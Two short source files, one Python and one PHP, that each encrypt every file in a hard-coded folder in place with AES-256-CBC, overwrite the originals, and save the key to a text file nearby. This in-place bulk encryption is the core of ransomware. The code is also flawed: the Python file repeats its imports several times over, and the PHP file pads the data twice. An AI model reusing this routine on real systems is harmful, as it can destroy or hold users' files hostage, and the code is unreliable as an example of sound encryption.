File: python/encryptor.py
import os
import pathlib
import random
import string
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

def generate_key():
    return os.urandom(32)

def pad_data(data):
    padder = padding.PKCS7(algorithms.AES.block_size).padder()
    padded_data = padder.update(data) + padder.finalize()
    return padded_data

def encrypt_file(file_path, key):
    backend = default_backend()
    iv = os.urandom(16)
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)
    encryptor = cipher.encryptor()

    with open(file_path, 'rb') as f:
        data = f.read()

    padded_data = pad_data(data)
    encrypted_data = encryptor.update(padded_data) + encryptor.finalize()

    with open(file_path, 'wb') as f:
        f.write(iv + encrypted_data)

def process_folder(folder_path, key):
    for entry in pathlib.Path(folder_path).iterdir():
        if entry.is_file():
            encrypt_file(entry, key)

def main():
    folder_path = "D:\\Test\\Docs"
    parent_path = pathlib.Path(folder_path).parent
    key_file_path = parent_path / "key.txt"

    key = generate_key()

    with open(key_file_path, 'wb') as f:
        f.write(key)

    process_folder(folder_path, key)

if __name__ == "__main__":
    main()

File: PHP/encryptor.php
<?php

function generateKey() {
    return openssl_random_pseudo_bytes(32);
}

function padData($data) {
    $blockSize = 16;
    $paddingLength = $blockSize - (strlen($data) % $blockSize);
    return $data . str_repeat(chr($paddingLength), $paddingLength);
}

function encryptFile($filePath, $key) {
    $iv = openssl_random_pseudo_bytes(16);
    $data = file_get_contents($filePath);
    $paddedData = padData($data);
    $encryptedData = openssl_encrypt($paddedData, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv);

    file_put_contents($filePath, $iv . $encryptedData);
}

function processFolder($folderPath, $key) {
    $files = scandir($folderPath);
    foreach ($files as $file) {
        $filePath = $folderPath . DIRECTORY_SEPARATOR . $file;
        if (is_file($filePath)) {
            encryptFile($filePath, $key);
        }
    }
}

function main() {
    $folderPath = "E:/Test/Folder";
    $parentPath = dirname($folderPath);
    $keyFilePath = $parentPath . DIRECTORY_SEPARATOR . "key.txt";

    $key = generateKey();
    file_put_contents($keyFilePath, $key);

    processFolder($folderPath, $key);
}

main();
?>
